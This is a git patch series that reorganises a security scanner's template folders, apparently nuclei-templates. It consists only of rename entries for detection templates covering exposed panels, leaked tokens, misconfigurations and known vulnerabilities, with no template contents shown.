similarity index 100%
rename from panels/webeditors.yaml
rename to exposed-panels/webeditors.yaml
diff --git a/panels/webmin-panel.yaml b/exposed-panels/webmin-panel.yaml
similarity index 100%
rename from panels/webmin-panel.yaml
rename to exposed-panels/webmin-panel.yaml
diff --git a/panels/workspace-one-uem.yaml b/exposed-panels/workspace-one-uem.yaml
similarity index 100%
rename from panels/workspace-one-uem.yaml
rename to exposed-panels/workspace-one-uem.yaml
diff --git a/panels/workspaceone-uem-airwatch-dashboard-detect.yaml b/exposed-panels/workspaceone-uem-airwatch-dashboard-detect.yaml
similarity index 100%
rename from panels/workspaceone-uem-airwatch-dashboard-detect.yaml
rename to exposed-panels/workspaceone-uem-airwatch-dashboard-detect.yaml
diff --git a/tokens/amazon-mws-auth-token-value.yaml b/exposed-tokens/tokens/amazon-mws-auth-token-value.yaml
similarity index 100%
rename from tokens/amazon-mws-auth-token-value.yaml
rename to exposed-tokens/tokens/amazon-mws-auth-token-value.yaml
diff --git a/tokens/aws-access-key-value.yaml b/exposed-tokens/tokens/aws-access-key-value.yaml
similarity index 100%
rename from tokens/aws-access-key-value.yaml
rename to exposed-tokens/tokens/aws-access-key-value.yaml
diff --git a/tokens/credentials-disclosure.yaml b/exposed-tokens/tokens/credentials-disclosure.yaml
similarity index 100%
rename from tokens/credentials-disclosure.yaml
rename to exposed-tokens/tokens/credentials-disclosure.yaml
diff --git a/tokens/fcm-server-key.yaml b/exposed-tokens/tokens/fcm-server-key.yaml
similarity index 100%
rename from tokens/fcm-server-key.yaml
rename to exposed-tokens/tokens/fcm-server-key.yaml
diff --git a/tokens/google-api-key.yaml b/exposed-tokens/tokens/google-api-key.yaml
similarity index 100%
rename from tokens/google-api-key.yaml
rename to exposed-tokens/tokens/google-api-key.yaml
diff --git a/tokens/http-username-password.yaml b/exposed-tokens/tokens/http-username-password.yaml
similarity index 100%
rename from tokens/http-username-password.yaml
rename to exposed-tokens/tokens/http-username-password.yaml
diff --git a/tokens/mailchimp-api-key.yaml b/exposed-tokens/tokens/mailchimp-api-key.yaml
similarity index 100%
rename from tokens/mailchimp-api-key.yaml
rename to exposed-tokens/tokens/mailchimp-api-key.yaml
diff --git a/tokens/slack-access-token.yaml b/exposed-tokens/tokens/slack-access-token.yaml
similarity index 100%
rename from tokens/slack-access-token.yaml
rename to exposed-tokens/tokens/slack-access-token.yaml
diff --git a/payloads/CVE-2020-5776.csv b/helpers/payloads/CVE-2020-5776.csv
similarity index 100%
rename from payloads/CVE-2020-5776.csv
rename to helpers/payloads/CVE-2020-5776.csv
diff --git a/payloads/CVE-2020-6287.xml b/helpers/payloads/CVE-2020-6287.xml
similarity index 100%
rename from payloads/CVE-2020-6287.xml
rename to helpers/payloads/CVE-2020-6287.xml
diff --git a/wordlists/wp-plugins.txt b/helpers/wordlists/wp-plugins.txt
similarity index 100%
rename from wordlists/wp-plugins.txt
rename to helpers/wordlists/wp-plugins.txt
diff --git a/misc/basic-cors-flash.yaml b/miscellaneous/basic-cors-flash.yaml
similarity index 100%
rename from misc/basic-cors-flash.yaml
rename to miscellaneous/basic-cors-flash.yaml
diff --git a/misc/dir-listing.yaml b/miscellaneous/dir-listing.yaml
similarity index 100%
rename from misc/dir-listing.yaml
rename to miscellaneous/dir-listing.yaml
diff --git a/misc/htaccess-config.yaml b/miscellaneous/htaccess-config.yaml
similarity index 100%
rename from misc/htaccess-config.yaml
rename to miscellaneous/htaccess-config.yaml
diff --git a/misc/missing-csp.yaml b/miscellaneous/missing-csp.yaml
similarity index 100%
rename from misc/missing-csp.yaml
rename to miscellaneous/missing-csp.yaml
diff --git a/misc/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml
similarity index 100%
rename from misc/missing-hsts.yaml
rename to miscellaneous/missing-hsts.yaml
diff --git a/misc/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml
similarity index 100%
rename from misc/missing-x-frame-options.yaml
rename to miscellaneous/missing-x-frame-options.yaml
diff --git a/misc/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml
similarity index 100%
rename from misc/ntlm-directories.yaml
rename to miscellaneous/ntlm-directories.yaml
diff --git a/misc/old-copyright.yaml b/miscellaneous/old-copyright.yaml
similarity index 100%
rename from misc/old-copyright.yaml
rename to miscellaneous/old-copyright.yaml
diff --git a/misc/robots.txt.yaml b/miscellaneous/robots.txt.yaml
similarity index 100%
rename from misc/robots.txt.yaml
rename to miscellaneous/robots.txt.yaml
diff --git a/misc/security.txt.yaml b/miscellaneous/security.txt.yaml
similarity index 100%
rename from misc/security.txt.yaml
rename to miscellaneous/security.txt.yaml
diff --git a/misc/trace-method.yaml b/miscellaneous/trace-method.yaml
similarity index 100%
rename from misc/trace-method.yaml
rename to miscellaneous/trace-method.yaml
diff --git a/misc/unencrypted-bigip-ltm-cookie.yaml b/miscellaneous/unencrypted-bigip-ltm-cookie.yaml
similarity index 100%
rename from misc/unencrypted-bigip-ltm-cookie.yaml
rename to miscellaneous/unencrypted-bigip-ltm-cookie.yaml
diff --git a/misc/wp-xmlrpc.yaml b/miscellaneous/wp-xmlrpc.yaml
similarity index 100%
rename from misc/wp-xmlrpc.yaml
rename to miscellaneous/wp-xmlrpc.yaml
diff --git a/misc/xml-schema-detect.yaml b/miscellaneous/xml-schema-detect.yaml
similarity index 100%
rename from misc/xml-schema-detect.yaml
rename to miscellaneous/xml-schema-detect.yaml
diff --git a/security-misconfiguration/aem-groovyconsole.yaml b/misconfiguration/aem-groovyconsole.yaml
similarity index 100%
rename from security-misconfiguration/aem-groovyconsole.yaml
rename to misconfiguration/aem-groovyconsole.yaml
diff --git a/security-misconfiguration/apache-tomcat-snoop.yaml b/misconfiguration/apache-tomcat-snoop.yaml
similarity index 100%
rename from security-misconfiguration/apache-tomcat-snoop.yaml
rename to misconfiguration/apache-tomcat-snoop.yaml
diff --git a/security-misconfiguration/aspx-debug-mode.yaml b/misconfiguration/aspx-debug-mode.yaml
similarity index 100%
rename from security-misconfiguration/aspx-debug-mode.yaml
rename to misconfiguration/aspx-debug-mode.yaml
diff --git a/security-misconfiguration/basic-cors.yaml b/misconfiguration/basic-cors.yaml
similarity index 100%
rename from security-misconfiguration/basic-cors.yaml
rename to misconfiguration/basic-cors.yaml
diff --git a/security-misconfiguration/django-debug-detect.yaml b/misconfiguration/django-debug-detect.yaml
similarity index 100%
rename from security-misconfiguration/django-debug-detect.yaml
rename to misconfiguration/django-debug-detect.yaml
diff --git a/security-misconfiguration/drupal-user-enum-ajax.yaml b/misconfiguration/drupal-user-enum-ajax.yaml
similarity index 100%
rename from security-misconfiguration/drupal-user-enum-ajax.yaml
rename to misconfiguration/drupal-user-enum-ajax.yaml
diff --git a/security-misconfiguration/drupal-user-enum-redirect.yaml b/misconfiguration/drupal-user-enum-redirect.yaml
similarity index 100%
rename from security-misconfiguration/drupal-user-enum-redirect.yaml
rename to misconfiguration/drupal-user-enum-redirect.yaml
diff --git a/security-misconfiguration/exposed-service-now.yaml b/misconfiguration/exposed-service-now.yaml
similarity index 100%
rename from security-misconfiguration/exposed-service-now.yaml
rename to misconfiguration/exposed-service-now.yaml
diff --git a/security-misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml
similarity index 100%
rename from security-misconfiguration/front-page-misconfig.yaml
rename to misconfiguration/front-page-misconfig.yaml
diff --git a/generic-detections/basic-xss-prober.yaml b/misconfiguration/generic-detections/basic-xss-prober.yaml
similarity index 100%
rename from generic-detections/basic-xss-prober.yaml
rename to misconfiguration/generic-detections/basic-xss-prober.yaml
diff --git a/generic-detections/general-tokens.yaml b/misconfiguration/generic-detections/general-tokens.yaml
similarity index 100%
rename from generic-detections/general-tokens.yaml
rename to misconfiguration/generic-detections/general-tokens.yaml
diff --git a/generic-detections/top-15-xss.yaml b/misconfiguration/generic-detections/top-15-xss.yaml
similarity index 100%
rename from generic-detections/top-15-xss.yaml
rename to misconfiguration/generic-detections/top-15-xss.yaml
diff --git a/security-misconfiguration/jenkins-stack-trace.yaml b/misconfiguration/jenkins-stack-trace.yaml
similarity index 100%
rename from security-misconfiguration/jenkins-stack-trace.yaml
rename to misconfiguration/jenkins-stack-trace.yaml
diff --git a/security-misconfiguration/jira-service-desk-signup.yaml b/misconfiguration/jira-service-desk-signup.yaml
similarity index 100%
rename from security-misconfiguration/jira-service-desk-signup.yaml
rename to misconfiguration/jira-service-desk-signup.yaml
diff --git a/security-misconfiguration/jira-unauthenticated-dashboards.yaml b/misconfiguration/jira-unauthenticated-dashboards.yaml
similarity index 100%
rename from security-misconfiguration/jira-unauthenticated-dashboards.yaml
rename to misconfiguration/jira-unauthenticated-dashboards.yaml
diff --git a/security-misconfiguration/jira-unauthenticated-popular-filters.yaml b/misconfiguration/jira-unauthenticated-popular-filters.yaml
similarity index 100%
rename from security-misconfiguration/jira-unauthenticated-popular-filters.yaml
rename to misconfiguration/jira-unauthenticated-popular-filters.yaml
diff --git a/security-misconfiguration/jira-unauthenticated-projects.yaml b/misconfiguration/jira-unauthenticated-projects.yaml
similarity index 100%
rename from security-misconfiguration/jira-unauthenticated-projects.yaml
rename to misconfiguration/jira-unauthenticated-projects.yaml
diff --git a/security-misconfiguration/jira-unauthenticated-user-picker.yaml b/misconfiguration/jira-unauthenticated-user-picker.yaml
similarity index 100%
rename from security-misconfiguration/jira-unauthenticated-user-picker.yaml
rename to misconfiguration/jira-unauthenticated-user-picker.yaml
diff --git a/security-misconfiguration/jupyter-ipython-unauth.yaml b/misconfiguration/jupyter-ipython-unauth.yaml
similarity index 100%
rename from security-misconfiguration/jupyter-ipython-unauth.yaml
rename to misconfiguration/jupyter-ipython-unauth.yaml
diff --git a/security-misconfiguration/larvel-debug.yaml b/misconfiguration/larvel-debug.yaml
similarity index 100%
rename from security-misconfiguration/larvel-debug.yaml
rename to misconfiguration/larvel-debug.yaml
diff --git a/security-misconfiguration/manage-engine-ad-search.yaml b/misconfiguration/manage-engine-ad-search.yaml
similarity index 100%
rename from security-misconfiguration/manage-engine-ad-search.yaml
rename to misconfiguration/manage-engine-ad-search.yaml
diff --git a/security-misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml
similarity index 100%
rename from security-misconfiguration/put-method-enabled.yaml
rename to misconfiguration/put-method-enabled.yaml
diff --git a/security-misconfiguration/rack-mini-profiler.yaml b/misconfiguration/rack-mini-profiler.yaml
similarity index 100%
rename from security-misconfiguration/rack-mini-profiler.yaml
rename to misconfiguration/rack-mini-profiler.yaml
diff --git a/security-misconfiguration/salesforce-aura-misconfig.yaml b/misconfiguration/salesforce-aura-misconfig.yaml
similarity index 100%
rename from security-misconfiguration/salesforce-aura-misconfig.yaml
rename to misconfiguration/salesforce-aura-misconfig.yaml
diff --git a/security-misconfiguration/sidekiq-dashboard.yaml b/misconfiguration/sidekiq-dashboard.yaml
similarity index 100%
rename from security-misconfiguration/sidekiq-dashboard.yaml
rename to misconfiguration/sidekiq-dashboard.yaml
diff --git a/security-misconfiguration/springboot-detect.yaml b/misconfiguration/springboot-detect.yaml
similarity index 100%
rename from security-misconfiguration/springboot-detect.yaml
rename to misconfiguration/springboot-detect.yaml
diff --git a/security-misconfiguration/unauthenticated-airflow.yaml b/misconfiguration/unauthenticated-airflow.yaml
similarity index 100%
rename from security-misconfiguration/unauthenticated-airflow.yaml
rename to misconfiguration/unauthenticated-airflow.yaml
diff --git a/security-misconfiguration/unauthenticated-jenkin-dashboard.yaml b/misconfiguration/unauthenticated-jenkin-dashboard.yaml
similarity index 100%
rename from security-misconfiguration/unauthenticated-jenkin-dashboard.yaml
rename to misconfiguration/unauthenticated-jenkin-dashboard.yaml
diff --git a/security-misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml
similarity index 100%
rename from security-misconfiguration/unauthenticated-nacos-access.yaml
rename to misconfiguration/unauthenticated-nacos-access.yaml
diff --git a/security-misconfiguration/wamp-xdebug-detect.yaml b/misconfiguration/wamp-xdebug-detect.yaml
similarity index 100%
rename from security-misconfiguration/wamp-xdebug-detect.yaml
rename to misconfiguration/wamp-xdebug-detect.yaml
diff --git a/security-misconfiguration/wordpress-accessible-wpconfig.yaml b/misconfiguration/wordpress-accessible-wpconfig.yaml
similarity index 100%
rename from security-misconfiguration/wordpress-accessible-wpconfig.yaml
rename to misconfiguration/wordpress-accessible-wpconfig.yaml
diff --git a/security-misconfiguration/zenphoto-installation-sensitive-info.yaml b/misconfiguration/zenphoto-installation-sensitive-info.yaml
similarity index 100%
rename from security-misconfiguration/zenphoto-installation-sensitive-info.yaml
rename to misconfiguration/zenphoto-installation-sensitive-info.yaml
diff --git a/subdomain-takeover/detect-all-takeovers.yaml b/takeovers/detect-all-takeovers.yaml
similarity index 100%
rename from subdomain-takeover/detect-all-takeovers.yaml
rename to takeovers/detect-all-takeovers.yaml
diff --git a/subdomain-takeover/s3-subtakeover.yaml b/takeovers/s3-subtakeover.yaml
similarity index 100%
rename from subdomain-takeover/s3-subtakeover.yaml
rename to takeovers/s3-subtakeover.yaml

From 95d784d9b756f7fc75f560c32a592115d764d1f8 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Fri, 8 Jan 2021 22:25:54 +0530
Subject: [PATCH 20/85] moving folder/files around

---
 .../{ => apache}/tomcat-manager-default.yaml  |  0
 .../grafana-default-credential.yaml           |  0
 .../rabbitmq-default-admin.yaml               |  0
 .../solarwinds-default-admin.yaml             |  0
 .../apis}/swagger-panel.yaml                  |  0
 exposed-files/{ => apis}/wadl-files.yaml      |  0
 exposed-files/{ => apis}/wsdl-detect.yaml     |  0
 exposed-files/{ => backups}/sql-dump.yaml     |  0
 .../{ => backups}/zip-backup-files.yaml       |  0
 .../{ => configs}/composer-config.yaml        |  0
 exposed-files/{ => configs}/exposed-svn.yaml  |  0
 .../configs}/git-config-nginxoffbyslash.yaml  |  0
 exposed-files/{ => configs}/git-config.yaml   |  0
 exposed-files/{ => configs}/laravel-env.yaml  |  0
 .../{ => configs}/magento-config.yaml         |  0
 .../{ => configs}/owncloud-config.yaml        |  0
 exposed-files/{ => configs}/package-json.yaml |  0
 exposed-files/{ => configs}/phpinfo.yaml      |  0
 .../{ => configs}/redmine-db-config.yaml      |  0
 exposed-files/{ => configs}/web-config.yaml   |  0
 exposed-files/{ => logs}/elmah-log-file.yaml  |  0
 exposed-files/{ => logs}/error-logs.yaml      |  0
 .../{compal.yaml => compal-panel.yaml}        |  0
 .../public-tomcat-instance.yaml               |  0
 .../amazon-mws-auth-token-value.yaml          |  0
 .../{tokens => aws}/aws-access-key-value.yaml |  0
 .../credentials-disclosure.yaml               |  0
 .../generic}/general-tokens.yaml              |  0
 .../http-username-password.yaml               |  0
 .../{tokens => google}/fcm-server-key.yaml    |  0
 .../{tokens => google}/google-api-key.yaml    |  0
 .../mailchimp-api-key.yaml                    |  0
 .../{tokens => slack}/slack-access-token.yaml |  0
 .../apc-info.yaml                             |  0
 .../basic-xss-prober.yaml                     |  0
 .../cgi-test-page.yaml                        |  0
 .../docker-api.yaml                           |  0
 .../druid-monitor.yaml                        |  0
 .../elasticsearch.yaml                        |  0
 .../exposed-kibana.yaml                       |  0
 .../jkstatus-manager.yaml                     |  0
 .../kubernetes-pods.yaml                      |  0
 .../linkerd-ssrf-detect.yaml                  |  0
 .../php-errors.yaml                           |  0
 .../shell-history.yaml                        |  0
 .../tomcat-scripts.yaml                       |  0
 .../firebase-detect.yaml                      |  0
 {exposed-files => technologies}/jolokia.yaml  |  0
 vulnerabilities/crlf-injection.yaml           | 52 ++++++++++---------
 .../generic}/top-15-xss.yaml                  |  0
 .../jenkins}/jenkins-asyncpeople.yaml         |  0
 .../jenkins}/jenkins-stack-trace.yaml         |  0
 .../unauthenticated-jenkin-dashboard.yaml     |  0
 .../jira}/jira-service-desk-signup.yaml       |  0
 .../jira-unauthenticated-dashboards.yaml      |  0
 .../jira-unauthenticated-popular-filters.yaml |  0
 .../jira}/jira-unauthenticated-projects.yaml  |  0
 .../jira-unauthenticated-user-picker.yaml     |  0
 .../{ => moodle}/moodle-filter-jmol-lfi.yaml  |  0
 .../{ => moodle}/moodle-filter-jmol-xss.yaml  |  0
 vulnerabilities/open-redirect.yaml            | 27 ----------
 .../oracle-ebs-bispgraph-file-access.yaml     |  0
 vulnerabilities/{ => rails}/rails6-xss.yaml   |  0
 .../springboot-actuators-jolokia-xxe.yaml     |  0
 .../springboot-h2-db-rce.yaml                 |  0
 .../vmware-vcenter-lfi-linux.yaml             |  0
 .../{ => vmware}/vmware-vcenter-lfi.yaml      |  0
 .../{ => wordpress}/easy-wp-smtp-listing.yaml |  0
 .../{ => wordpress}/w3c-total-cache-ssrf.yaml |  0
 .../wordpress-accessible-wpconfig.yaml        |  0
 .../wordpress}/wordpress-db-backup.yaml       |  0
 .../wordpress}/wordpress-debug-log.yaml       |  0
 .../wordpress-directory-listing.yaml          |  0
 ...s-emails-verification-for-woocommerce.yaml |  0
 .../wordpress-emergency-script.yaml           |  0
 .../wordpress}/wordpress-installer-log.yaml   |  0
 .../wordpress-social-metrics-tracker.yaml     |  0
 .../wordpress}/wordpress-tmm-db-migrate.yaml  |  0
 .../wordpress-user-enumeration.yaml           |  0
 .../wordpress-wordfence-xss.yaml              |  0
 .../wordpress-wpcourses-info-disclosure.yaml  |  0
 81 files changed, 27 insertions(+), 52 deletions(-)
 rename default-logins/{ => apache}/tomcat-manager-default.yaml (100%)
 rename default-logins/{ => grafana}/grafana-default-credential.yaml (100%)
 rename default-logins/{ => rabbitmq}/rabbitmq-default-admin.yaml (100%)
 rename default-logins/{ => solarwinds}/solarwinds-default-admin.yaml (100%)
 rename {exposed-panels => exposed-files/apis}/swagger-panel.yaml (100%)
 rename exposed-files/{ => apis}/wadl-files.yaml (100%)
 rename exposed-files/{ => apis}/wsdl-detect.yaml (100%)
 rename exposed-files/{ => backups}/sql-dump.yaml (100%)
 rename exposed-files/{ => backups}/zip-backup-files.yaml (100%)
 rename exposed-files/{ => configs}/composer-config.yaml (100%)
 rename exposed-files/{ => configs}/exposed-svn.yaml (100%)
 rename {vulnerabilities => exposed-files/configs}/git-config-nginxoffbyslash.yaml (100%)
 rename exposed-files/{ => configs}/git-config.yaml (100%)
 rename exposed-files/{ => configs}/laravel-env.yaml (100%)
 rename exposed-files/{ => configs}/magento-config.yaml (100%)
 rename exposed-files/{ => configs}/owncloud-config.yaml (100%)
 rename exposed-files/{ => configs}/package-json.yaml (100%)
 rename exposed-files/{ => configs}/phpinfo.yaml (100%)
 rename exposed-files/{ => configs}/redmine-db-config.yaml (100%)
 rename exposed-files/{ => configs}/web-config.yaml (100%)
 rename exposed-files/{ => logs}/elmah-log-file.yaml (100%)
 rename exposed-files/{ => logs}/error-logs.yaml (100%)
 rename exposed-panels/{compal.yaml => compal-panel.yaml} (100%)
 rename {exposed-files => exposed-panels}/public-tomcat-instance.yaml (100%)
 rename exposed-tokens/{tokens => aws}/amazon-mws-auth-token-value.yaml (100%)
 rename exposed-tokens/{tokens => aws}/aws-access-key-value.yaml (100%)
 rename exposed-tokens/{tokens => generic}/credentials-disclosure.yaml (100%)
 rename {misconfiguration/generic-detections => exposed-tokens/generic}/general-tokens.yaml (100%)
 rename exposed-tokens/{tokens => generic}/http-username-password.yaml (100%)
 rename exposed-tokens/{tokens => google}/fcm-server-key.yaml (100%)
 rename exposed-tokens/{tokens => google}/google-api-key.yaml (100%)
 rename exposed-tokens/{tokens => mailchimp}/mailchimp-api-key.yaml (100%)
 rename exposed-tokens/{tokens => slack}/slack-access-token.yaml (100%)
 rename {exposed-files => misconfiguration}/apc-info.yaml (100%)
 rename misconfiguration/{generic-detections => }/basic-xss-prober.yaml (100%)
 rename {exposed-files => misconfiguration}/cgi-test-page.yaml (100%)
 rename {exposed-panels => misconfiguration}/docker-api.yaml (100%)
 rename {exposed-files => misconfiguration}/druid-monitor.yaml (100%)
 rename {exposed-files => misconfiguration}/elasticsearch.yaml (100%)
 rename {exposed-files => misconfiguration}/exposed-kibana.yaml (100%)
 rename {exposed-files => misconfiguration}/jkstatus-manager.yaml (100%)
 rename {exposed-panels => misconfiguration}/kubernetes-pods.yaml (100%)
 rename {technologies => misconfiguration}/linkerd-ssrf-detect.yaml (100%)
 rename {exposed-files => misconfiguration}/php-errors.yaml (100%)
 rename {exposed-files => misconfiguration}/shell-history.yaml (100%)
 rename {exposed-files => misconfiguration}/tomcat-scripts.yaml (100%)
 rename {exposed-files => technologies}/firebase-detect.yaml (100%)
 rename {exposed-files => technologies}/jolokia.yaml (100%)
 rename {misconfiguration/generic-detections => vulnerabilities/generic}/top-15-xss.yaml (100%)
 rename {exposed-panels => vulnerabilities/jenkins}/jenkins-asyncpeople.yaml (100%)
 rename {misconfiguration => vulnerabilities/jenkins}/jenkins-stack-trace.yaml (100%)
 rename {misconfiguration => vulnerabilities/jenkins}/unauthenticated-jenkin-dashboard.yaml (100%)
 rename {misconfiguration => vulnerabilities/jira}/jira-service-desk-signup.yaml (100%)
 rename {misconfiguration => vulnerabilities/jira}/jira-unauthenticated-dashboards.yaml (100%)
 rename {misconfiguration => vulnerabilities/jira}/jira-unauthenticated-popular-filters.yaml (100%)
 rename {misconfiguration => vulnerabilities/jira}/jira-unauthenticated-projects.yaml (100%)
 rename {misconfiguration => vulnerabilities/jira}/jira-unauthenticated-user-picker.yaml (100%)
 rename vulnerabilities/{ => moodle}/moodle-filter-jmol-lfi.yaml (100%)
 rename vulnerabilities/{ => moodle}/moodle-filter-jmol-xss.yaml (100%)
 delete mode 100644 vulnerabilities/open-redirect.yaml
 rename vulnerabilities/{ => oracle}/oracle-ebs-bispgraph-file-access.yaml (100%)
 rename vulnerabilities/{ => rails}/rails6-xss.yaml (100%)
 rename vulnerabilities/{ => springboot}/springboot-actuators-jolokia-xxe.yaml (100%)
 rename vulnerabilities/{ => springboot}/springboot-h2-db-rce.yaml (100%)
 rename vulnerabilities/{ => vmware}/vmware-vcenter-lfi-linux.yaml (100%)
 rename vulnerabilities/{ => vmware}/vmware-vcenter-lfi.yaml (100%)
 rename vulnerabilities/{ => wordpress}/easy-wp-smtp-listing.yaml (100%)
 rename vulnerabilities/{ => wordpress}/w3c-total-cache-ssrf.yaml (100%)
 rename {misconfiguration => vulnerabilities/wordpress}/wordpress-accessible-wpconfig.yaml (100%)
 rename {exposed-files => vulnerabilities/wordpress}/wordpress-db-backup.yaml (100%)
 rename {exposed-files => vulnerabilities/wordpress}/wordpress-debug-log.yaml (100%)
 rename {exposed-files => vulnerabilities/wordpress}/wordpress-directory-listing.yaml (100%)
 rename vulnerabilities/{ => wordpress}/wordpress-emails-verification-for-woocommerce.yaml (100%)
 rename {exposed-files => vulnerabilities/wordpress}/wordpress-emergency-script.yaml (100%)
 rename {exposed-files => vulnerabilities/wordpress}/wordpress-installer-log.yaml (100%)
 rename vulnerabilities/{ => wordpress}/wordpress-social-metrics-tracker.yaml (100%)
 rename {exposed-files => vulnerabilities/wordpress}/wordpress-tmm-db-migrate.yaml (100%)
 rename {exposed-files => vulnerabilities/wordpress}/wordpress-user-enumeration.yaml (100%)
 rename vulnerabilities/{ => wordpress}/wordpress-wordfence-xss.yaml (100%)
 rename vulnerabilities/{ => wordpress}/wordpress-wpcourses-info-disclosure.yaml (100%)

diff --git a/default-logins/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml
similarity index 100%
rename from default-logins/tomcat-manager-default.yaml
rename to default-logins/apache/tomcat-manager-default.yaml
diff --git a/default-logins/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml
similarity index 100%
rename from default-logins/grafana-default-credential.yaml
rename to default-logins/grafana/grafana-default-credential.yaml
diff --git a/default-logins/rabbitmq-default-admin.yaml b/default-logins/rabbitmq/rabbitmq-default-admin.yaml
similarity index 100%
rename from default-logins/rabbitmq-default-admin.yaml
rename to default-logins/rabbitmq/rabbitmq-default-admin.yaml
diff --git a/default-logins/solarwinds-default-admin.yaml b/default-logins/solarwinds/solarwinds-default-admin.yaml
similarity index 100%
rename from default-logins/solarwinds-default-admin.yaml
rename to default-logins/solarwinds/solarwinds-default-admin.yaml
diff --git a/exposed-panels/swagger-panel.yaml b/exposed-files/apis/swagger-panel.yaml
similarity index 100%
rename from exposed-panels/swagger-panel.yaml
rename to exposed-files/apis/swagger-panel.yaml
diff --git a/exposed-files/wadl-files.yaml b/exposed-files/apis/wadl-files.yaml
similarity index 100%
rename from exposed-files/wadl-files.yaml
rename to exposed-files/apis/wadl-files.yaml
diff --git a/exposed-files/wsdl-detect.yaml b/exposed-files/apis/wsdl-detect.yaml
similarity index 100%
rename from exposed-files/wsdl-detect.yaml
rename to exposed-files/apis/wsdl-detect.yaml
diff --git a/exposed-files/sql-dump.yaml b/exposed-files/backups/sql-dump.yaml
similarity index 100%
rename from exposed-files/sql-dump.yaml
rename to exposed-files/backups/sql-dump.yaml
diff --git a/exposed-files/zip-backup-files.yaml b/exposed-files/backups/zip-backup-files.yaml
similarity index 100%
rename from exposed-files/zip-backup-files.yaml
rename to exposed-files/backups/zip-backup-files.yaml
diff --git a/exposed-files/composer-config.yaml b/exposed-files/configs/composer-config.yaml
similarity index 100%
rename from exposed-files/composer-config.yaml
rename to exposed-files/configs/composer-config.yaml
diff --git a/exposed-files/exposed-svn.yaml b/exposed-files/configs/exposed-svn.yaml
similarity index 100%
rename from exposed-files/exposed-svn.yaml
rename to exposed-files/configs/exposed-svn.yaml
diff --git a/vulnerabilities/git-config-nginxoffbyslash.yaml b/exposed-files/configs/git-config-nginxoffbyslash.yaml
similarity index 100%
rename from vulnerabilities/git-config-nginxoffbyslash.yaml
rename to exposed-files/configs/git-config-nginxoffbyslash.yaml
diff --git a/exposed-files/git-config.yaml b/exposed-files/configs/git-config.yaml
similarity index 100%
rename from exposed-files/git-config.yaml
rename to exposed-files/configs/git-config.yaml
diff --git a/exposed-files/laravel-env.yaml b/exposed-files/configs/laravel-env.yaml
similarity index 100%
rename from exposed-files/laravel-env.yaml
rename to exposed-files/configs/laravel-env.yaml
diff --git a/exposed-files/magento-config.yaml b/exposed-files/configs/magento-config.yaml
similarity index 100%
rename from exposed-files/magento-config.yaml
rename to exposed-files/configs/magento-config.yaml
diff --git a/exposed-files/owncloud-config.yaml b/exposed-files/configs/owncloud-config.yaml
similarity index 100%
rename from exposed-files/owncloud-config.yaml
rename to exposed-files/configs/owncloud-config.yaml
diff --git a/exposed-files/package-json.yaml b/exposed-files/configs/package-json.yaml
similarity index 100%
rename from exposed-files/package-json.yaml
rename to exposed-files/configs/package-json.yaml
diff --git a/exposed-files/phpinfo.yaml b/exposed-files/configs/phpinfo.yaml
similarity index 100%
rename from exposed-files/phpinfo.yaml
rename to exposed-files/configs/phpinfo.yaml
diff --git a/exposed-files/redmine-db-config.yaml b/exposed-files/configs/redmine-db-config.yaml
similarity index 100%
rename from exposed-files/redmine-db-config.yaml
rename to exposed-files/configs/redmine-db-config.yaml
diff --git a/exposed-files/web-config.yaml b/exposed-files/configs/web-config.yaml
similarity index 100%
rename from exposed-files/web-config.yaml
rename to exposed-files/configs/web-config.yaml
diff --git a/exposed-files/elmah-log-file.yaml b/exposed-files/logs/elmah-log-file.yaml
similarity index 100%
rename from exposed-files/elmah-log-file.yaml
rename to exposed-files/logs/elmah-log-file.yaml
diff --git a/exposed-files/error-logs.yaml b/exposed-files/logs/error-logs.yaml
similarity index 100%
rename from exposed-files/error-logs.yaml
rename to exposed-files/logs/error-logs.yaml
diff --git a/exposed-panels/compal.yaml b/exposed-panels/compal-panel.yaml
similarity index 100%
rename from exposed-panels/compal.yaml
rename to exposed-panels/compal-panel.yaml
diff --git a/exposed-files/public-tomcat-instance.yaml b/exposed-panels/public-tomcat-instance.yaml
similarity index 100%
rename from exposed-files/public-tomcat-instance.yaml
rename to exposed-panels/public-tomcat-instance.yaml
diff --git a/exposed-tokens/tokens/amazon-mws-auth-token-value.yaml b/exposed-tokens/aws/amazon-mws-auth-token-value.yaml
similarity index 100%
rename from exposed-tokens/tokens/amazon-mws-auth-token-value.yaml
rename to exposed-tokens/aws/amazon-mws-auth-token-value.yaml
diff --git a/exposed-tokens/tokens/aws-access-key-value.yaml b/exposed-tokens/aws/aws-access-key-value.yaml
similarity index 100%
rename from exposed-tokens/tokens/aws-access-key-value.yaml
rename to exposed-tokens/aws/aws-access-key-value.yaml
diff --git a/exposed-tokens/tokens/credentials-disclosure.yaml b/exposed-tokens/generic/credentials-disclosure.yaml
similarity index 100%
rename from exposed-tokens/tokens/credentials-disclosure.yaml
rename to exposed-tokens/generic/credentials-disclosure.yaml
diff --git a/misconfiguration/generic-detections/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml
similarity index 100%
rename from misconfiguration/generic-detections/general-tokens.yaml
rename to exposed-tokens/generic/general-tokens.yaml
diff --git a/exposed-tokens/tokens/http-username-password.yaml b/exposed-tokens/generic/http-username-password.yaml
similarity index 100%
rename from exposed-tokens/tokens/http-username-password.yaml
rename to exposed-tokens/generic/http-username-password.yaml
diff --git a/exposed-tokens/tokens/fcm-server-key.yaml b/exposed-tokens/google/fcm-server-key.yaml
similarity index 100%
rename from exposed-tokens/tokens/fcm-server-key.yaml
rename to exposed-tokens/google/fcm-server-key.yaml
diff --git a/exposed-tokens/tokens/google-api-key.yaml b/exposed-tokens/google/google-api-key.yaml
similarity index 100%
rename from exposed-tokens/tokens/google-api-key.yaml
rename to exposed-tokens/google/google-api-key.yaml
diff --git a/exposed-tokens/tokens/mailchimp-api-key.yaml b/exposed-tokens/mailchimp/mailchimp-api-key.yaml
similarity index 100%
rename from exposed-tokens/tokens/mailchimp-api-key.yaml
